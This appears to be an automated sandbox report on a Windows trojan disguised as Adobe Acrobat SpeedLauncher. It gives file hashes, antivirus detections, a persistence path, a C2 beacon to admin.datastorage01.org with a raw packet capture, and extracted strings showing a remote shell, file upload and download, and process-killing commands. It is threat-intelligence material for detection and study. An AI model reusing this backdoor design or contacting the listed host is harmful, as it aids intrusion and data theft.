Analysis Date2014-01-03 10:59:16
MD55e42780f52763c77d592044e535e4b01
SHA1749709b85d2cbc32c56e368f80fb4d4dcb70241c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d1846d4f6e59b61c85cbe19b6e516d8c sha1: e61c108e54760f4f6e2527afa4dbca153c42e756 size: 11264
Section.rdata md5: 6356fbb46ece2cba555bbbf3db04c95d sha1: 546656aa751db6826535dff4d865a399ee6a13ff size: 3584
Section.data md5: c6236a3d2692e03c79b2805c1bccdd6a sha1: 52dc69966a3ef83cb21a40c987ca7a3cec13abda size: 2560
Section.rsrc md5: 8fbfba501adb1c75c8a1c324872ad328 sha1: 94719d1b1a16013df1aa3fe0767cd76b9a6ca7b7 size: 1536
Timestamp2010-11-17 13:37:00
VersionLegalCopyright: Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights reserved
FileVersion: 9.0.0.332
CompanyName: Adobe Systems Incorporated
Comments:
ProductName: Adobe Acrobat
ProductVersion: 9, 0, 0, 0
FileDescription: Adobe Acrobat SpeedLauncher
OriginalFilename: AcroSpeedLaunch.exe
PackerMicrosoft Visual C++ v6.0
PEhash35fb281c5f462171ab2f2a96af23e2c56b514ad6
AVaviraTR/Downloader.Gen
AVclamavWin.Trojan.Agent-65195
AVavgAgent2.BVRT

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe

Creates MutexGLOBAL\MSFT64
Winsock URLhttp://admin.datastorage01.org/postinfo.html

Network Details:

DNSadmin.datastorage01.org
Type: A
96.43.141.186
HTTP GEThttp://admin.datastorage01.org/postinfo.html
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; COMPUTER-XXXXXX;Trident/4.0) 02:01
Flows TCP192.168.1.1:1031 ➝ 96.43.141.186:80

Raw Pcap
0x00000000 (00000)   47455420 2f706f73 74696e66 6f2e6874   GET /postinfo.ht
0x00000010 (00016)   6d6c2048 5454502f 312e310d 0a557365   ml HTTP/1.1..Use
0x00000020 (00032)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000030 (00048)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000040 (00064)   3b204d53 49452038 2e303b20 57696e64   ; MSIE 8.0; Wind
0x00000050 (00080)   6f777320 4e542035 2e313b20 434f4d50   ows NT 5.1; COMP
0x00000060 (00096)   55544552 2d585858 5858583b 54726964   UTER-XXXXXX;Trid
0x00000070 (00112)   656e742f 342e3029 2030323a 3031200d   ent/4.0) 02:01 .
0x00000080 (00128)   0a486f73 743a2061 646d696e 2e646174   .Host: admin.dat
0x00000090 (00144)   6173746f 72616765 30312e6f 72670d0a   astorage01.org..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a              o-cache....


Strings
040904b0
9, 0, 0, 0
9.0.0.332
AcroSpeedLaunch.exe
Adobe Acrobat
Adobe Acrobat SpeedLauncher
Adobe Systems Incorporated
Comments
CompanyName
Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights reserved
FileDescription
FileVersion
LegalCopyright
OriginalFilename
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
%-24s %s
%-26s %5d
??2@YAPAXI@Z
??3@YAXPAX@Z
Accept:*/*
_acmdln
_adjust_fdiv
Adobe Reader Speed Launcher
ADVAPI32.dll
 and the PID is %d
\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe
AttachConsole
blc-dwd
border=
Cache-Control:max-age=0
Cache-Control:no-cache
CD-ROM		
CloseHandle
CloseServiceHandle
\cmd.exe
cmd.exe
CmdPath=
Computer:
%ComSpec%
CONIN$
Content-Length: %d
_controlfp
ControlService
ControlService failed!
CopyFileA
Create failed with %d!
CreateFileA
CreateMutexA
CreatePipe
CreateProcessA
CreateProcessAsUserA
CreateProcess failed!
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
/C "%s"
__CxxFrameHandler
@.data
DefWindowProcA
DeleteFileA
DispatchMessageA
_EH_prolog
EnumServicesStatusExA
_except_handler3
ExitProcess
ExpandEnvironmentStringsA
Failed!
Failed with %d!
FileSize:	%d
Fixed		
GetComputerNameA
GetConsoleDisplayMode
GetCurrentProcess
GetDriveTypeA
GetExitCodeProcess
GetFileAttributesA
GetFileAttributes Error code: %d
GetFileSize
GetLastError
GetLocalTime
GetLogicalDrives
__getmainargs
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetStartupInfoA
GetSystemDirectoryA
GetSystemTime
GetTempFileNameA
GetTempPathA
geturl
GetUserNameA
GetUserNameExA
GetUserProfileDirectoryA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GLOBAL\MSFT64
<h1>Bad Request (Invalid Hostname)</h1>
HttpAddRequestHeadersA
HttpOpenRequestA
HttpSendRequestA
_initterm
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetQueryOptionA
InternetReadFile
InternetSetOptionA
Invalid		
KB968705.bat
KERNEL32.dll
list process failed!
list service failed!
lstrcatA
lstrlenA
MainWndClass
memcpy
memset
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %d.%d; %s;Trident/4.0) %02d:%02d 
Mozilla/5.0
MSVCRT.dll
OpenP failed with %d!
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenSCManager failed!
OpenServiceA
OpenService failed!
OpenT failed with %d!
__p__commode
PeekNamedPipe
__p__fmode
pidrun
Pragma:no-cache
Process32First
Process32Next
Process cmd.exe exited!
Program started!
Proxy-Connection:Keep-Alive
PVVVWV
QVVVPVV
Ramdisk		
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegisterClassExA
RegSetValueExA
Remote		
Removeable		
%*[^/]%*[/]%*[^/]%s
%s Connected!
Secur32.dll
Service does not exist!
Service doesn't start!
Service is running already!
Service started!
Service still running!
Service stopped!
Service stop pending!
__set_app_type
SetCurrentDirectoryA
SetFileTime
SetStdHandle
__setusermatherr
SHCreateDirectoryExA
SHELL32.dll
ShellExecuteA
Shell started fail!
Shell started successfully!
Shell started,wait to terminate it.....
Sleep Time:
Software\Microsoft\Windows\CurrentVersion\Run
So long!
sprintf
sscanf
Started already,
StartServiceA
StartService failed!
Start shell first.
strcat
strchr
_strcmpi
strcpy
strlen
_strnicmp
strrchr
strstr
Syntax error!
Syntax error!	Usage:	getf/putf FileName <N>
Syntax error!	Usage:	GetUrl URL FileName
Syntax error!	Usage:	kill </p|/s> <pid|ServiceName>
Syntax error!	Usage:	list </p|/s|/d>
Syntax error!	Usage:	start </p|/s> <filename|ServiceName>
SystemTimeToFileTime
t0V<#u
t4j SV3
\tasks
TerminateProcess
!This program cannot be run in DOS mode.
t:hLU@
t<Ht2Ht(Ht
Totally %d volumes found.
TranslateMessage
Unkown		
URLDownloadToFileA
urlmon.dll
USER32.dll
USERENV.dll
Volume on this computer:
Volume	Type		Volume Name
VPPPPh
VVhlQ@
VVVhX,@
WaitForSingleObject
whoami
width=
WININET.dll
WPhdR@
WriteConsoleInputA
WriteFile
_XcptFilter
YYh0U@
YYSSSSS
YYSSSVSS
YYt5j\
YYWWVh
YYWWVh93@
ZRichw